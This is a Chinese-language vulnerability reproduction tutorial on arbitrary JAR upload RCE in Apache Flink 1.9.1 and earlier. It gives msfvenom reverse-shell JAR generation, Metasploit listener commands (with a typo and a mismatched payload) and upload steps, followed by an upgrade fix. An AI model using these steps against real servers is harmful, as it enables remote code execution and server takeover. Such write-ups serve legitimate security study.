Apache Flink 任意 Jar 包上传导致 RCE 漏洞
Apache Flink 是一个分布式大数据处理引擎,可对有限数据流和无限数据流进行有状态计算。可部署在各种集群环境,对各种大小的数据规模进行快速计算。
ApacheFlink 是由 Apache 软件基金会开发的开源流处理框架,其核心是用 Java 和 Scala 编写的分布式流数据流引擎。Flink 以数据并行和流水线方式执行任意流数据程序,Flink 的流水线运行时系统可以执行批处理和流处理程序。此外,Flink 的运行时本身也支持迭代算法的执行。
攻击者可利用该漏洞在 Apache Flink Dashboard 页面中上传任意 Jar 包,利用 Metasploit 在 Apache Flink 服务器中执行任意代码,获取服务器最高权限,所以危害性较大。
影响范围
- Apache Flink <= 1.9.1
环境搭建
- 下载
Apache Flink 1.9.1
包:
wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
- 解压安装包:
tar –zxvf flink-1.9.1-bin-scala_2.11.tgz
- 进入到 bin 目录下面启动 Flink:
./start-cluster.sh
浏览器访问: http://IP:8081
漏洞复现
- msf 生成 reverse shell 的马
msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f jar > shell.jar
- msf 设置监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
expolit
- 上传
shell.jar
并提交
- 反弹回的
shell
修复建议
- 将 Apache Flink 升级最新版本
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论